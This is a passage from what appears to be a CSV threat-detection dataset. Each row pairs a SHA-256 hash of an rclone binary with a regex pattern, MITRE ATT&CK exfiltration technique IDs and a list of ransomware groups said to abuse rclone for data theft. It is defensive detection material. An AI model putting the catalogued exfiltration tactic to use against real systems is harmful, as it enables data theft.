T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3d62de527d3a1292219a95c311513899fe899b750428d9d809f556371d1f90b9*",".{0,1000}3d62de527d3a1292219a95c311513899fe899b750428d9d809f556371d1f90b9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3d815e0319651626bb752b11a4a1d78ea7fea889b99a92a52f5ce54db641f82f*",".{0,1000}3d815e0319651626bb752b11a4a1d78ea7fea889b99a92a52f5ce54db641f82f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3e04c44cdbc61721edef92ac05cc7e548e57e69397e54c24878e2edc56ddd3fb*",".{0,1000}3e04c44cdbc61721edef92ac05cc7e548e57e69397e54c24878e2edc56ddd3fb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3e08555b23f907601feacbfcbece4fa635812ae7a28061f25e2aa6d54e48124c*",".{0,1000}3e08555b23f907601feacbfcbece4fa635812ae7a28061f25e2aa6d54e48124c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3e1cfdaa245dd2d7789d33a0be13c5bd5ef91e1da6e5eefd380cdf3fb1d50d63*",".{0,1000}3e1cfdaa245dd2d7789d33a0be13c5bd5ef91e1da6e5eefd380cdf3fb1d50d63.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3e3d48e0a1de878866d3f6d9beb1009c4140ede45b95d092bcaf68fae6a030a0*",".{0,1000}3e3d48e0a1de878866d3f6d9beb1009c4140ede45b95d092bcaf68fae6a030a0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3e435c81cc364a3c6f1d5f9305f03dbf5152e85f445c9354cc16b30654fd444e*",".{0,1000}3e435c81cc364a3c6f1d5f9305f03dbf5152e85f445c9354cc16b30654fd444e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3e5ffce470feaeeb55edfaaec9b89ccb43feed4133d267eb77fd4ef3da4d9b73*",".{0,1000}3e5ffce470feaeeb55edfaaec9b89ccb43feed4133d267eb77fd4ef3da4d9b73.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3ee1b022bb0519d3aeb745f00dae50452b159ba1b912d607278609d7a582f883*",".{0,1000}3ee1b022bb0519d3aeb745f00dae50452b159ba1b912d607278609d7a582f883.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3ee1eca313dce3dea259fcf6951a9350b09763ecfef0ef1866ec2e9fe81f7b61*",".{0,1000}3ee1eca313dce3dea259fcf6951a9350b09763ecfef0ef1866ec2e9fe81f7b61.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3ee64a172c1a706749b25d6b12c4bf8c7896a93c52a803fc90548917cef72e13*",".{0,1000}3ee64a172c1a706749b25d6b12c4bf8c7896a93c52a803fc90548917cef72e13.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3f50d0a422df063a5b331f49f2255d8180e851f963f54857b722ae1c2eb89bd0*",".{0,1000}3f50d0a422df063a5b331f49f2255d8180e851f963f54857b722ae1c2eb89bd0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3fafe29d84e57deb5130c4f7a77f50e52ae5f4dc0d1499a11b7ac499c6c106b3*",".{0,1000}3fafe29d84e57deb5130c4f7a77f50e52ae5f4dc0d1499a11b7ac499c6c106b3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4002d10859ed910f4196db8dcc00732f75553aa972ea262884d69b649754d924*",".{0,1000}4002d10859ed910f4196db8dcc00732f75553aa972ea262884d69b649754d924.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4042d649ac4c62d1b8eac5c071ff714f62f94df4a308e3a0b17de7e2e57df9ab*",".{0,1000}4042d649ac4c62d1b8eac5c071ff714f62f94df4a308e3a0b17de7e2e57df9ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*405f614bdde26a1e2ff55631cf9be70946b1cf0270812869979d9c0d8a5eaa5e*",".{0,1000}405f614bdde26a1e2ff55631cf9be70946b1cf0270812869979d9c0d8a5eaa5e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*408376273b03ff8f5c3e4b216647a5db23b9aa75b9b8026f2fe7d0ffa6bf2d3b*",".{0,1000}408376273b03ff8f5c3e4b216647a5db23b9aa75b9b8026f2fe7d0ffa6bf2d3b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4087bcd3d012bd26bb52001da514e1604ccae2221acd339262b5fd47ea7115c3*",".{0,1000}4087bcd3d012bd26bb52001da514e1604ccae2221acd339262b5fd47ea7115c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*40b08d7e300fd1d46d9225ad6d52149e4194c3f0d0b65361c04fb606d908a689*",".{0,1000}40b08d7e300fd1d46d9225ad6d52149e4194c3f0d0b65361c04fb606d908a689.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*40d243dd3460e13d50f226a15179c41c2aacbd94aab1e674b1437f377b57c6f2*",".{0,1000}40d243dd3460e13d50f226a15179c41c2aacbd94aab1e674b1437f377b57c6f2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*411cd0194b22b0faf50bcf7beaed9a0d4efabf13baff4dfa7697793319d6f175*",".{0,1000}411cd0194b22b0faf50bcf7beaed9a0d4efabf13baff4dfa7697793319d6f175.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4142fb8124bf37c432a14d469b8f3b194f3a0ea3aec3aa690d2c28d12affda90*",".{0,1000}4142fb8124bf37c432a14d469b8f3b194f3a0ea3aec3aa690d2c28d12affda90.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*41a404f59d6640bae7726c29479528113cb7e95c0a3c5ea91eefabdf6cf43f24*",".{0,1000}41a404f59d6640bae7726c29479528113cb7e95c0a3c5ea91eefabdf6cf43f24.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*41de382da51e57e7519012830002af83ca551927551ab8b277a21d24905ff177*",".{0,1000}41de382da51e57e7519012830002af83ca551927551ab8b277a21d24905ff177.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*421d9592c839d903608d1725007dfe5243f30fe812c0054b9d21f1eaa05b4a1c*",".{0,1000}421d9592c839d903608d1725007dfe5243f30fe812c0054b9d21f1eaa05b4a1c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*42551d31c0028e2322dab5e6a26702990f03ca68e7c4c68f32cbee9dd0631a7c*",".{0,1000}42551d31c0028e2322dab5e6a26702990f03ca68e7c4c68f32cbee9dd0631a7c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4278d9d0aa57b846f13198f9cb4ef1ccc8ab321333cf4b73c308c3406216bedd*",".{0,1000}4278d9d0aa57b846f13198f9cb4ef1ccc8ab321333cf4b73c308c3406216bedd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*427bb5079d04d1eb37eb67d56d2aae2d9e60f837c3abd410ade4c07cab895b7a*",".{0,1000}427bb5079d04d1eb37eb67d56d2aae2d9e60f837c3abd410ade4c07cab895b7a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*429ab13f98bcc8f07a1b320c2f9d89ff081facd016682ddfb73208fdcf41c9ce*",".{0,1000}429ab13f98bcc8f07a1b320c2f9d89ff081facd016682ddfb73208fdcf41c9ce.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*42efd51a6ecfbc09d747d57e7c8c9a056b984aae674c267b483fa776c0f35ace*",".{0,1000}42efd51a6ecfbc09d747d57e7c8c9a056b984aae674c267b483fa776c0f35ace.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*431c443be43fc659fd31b19c64026b55759664a44cf2e308be9c58029f80729a*",".{0,1000}431c443be43fc659fd31b19c64026b55759664a44cf2e308be9c58029f80729a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*43b55bc926924487614bedd1aed51dbc73ec39b5eadcf2ef8e9e10f6c88ec59f*",".{0,1000}43b55bc926924487614bedd1aed51dbc73ec39b5eadcf2ef8e9e10f6c88ec59f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*43cb85b6a163e9ab66491f8e694e092a075c3974a241815332073bc16ec8adbf*",".{0,1000}43cb85b6a163e9ab66491f8e694e092a075c3974a241815332073bc16ec8adbf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*43d1d270b11291f565e46b42c488c37e1259768f87348c66689c2e0b0351a4c3*",".{0,1000}43d1d270b11291f565e46b42c488c37e1259768f87348c66689c2e0b0351a4c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*43e2c9b640eee24a3a4da058758392e5733dc2571c5cf5b1187116821987f0cd*",".{0,1000}43e2c9b640eee24a3a4da058758392e5733dc2571c5cf5b1187116821987f0cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4466b826446373956d48283e2f52cd0fc3e52e0a9d4c67cccc5ddeb5838940cd*",".{0,1000}4466b826446373956d48283e2f52cd0fc3e52e0a9d4c67cccc5ddeb5838940cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - 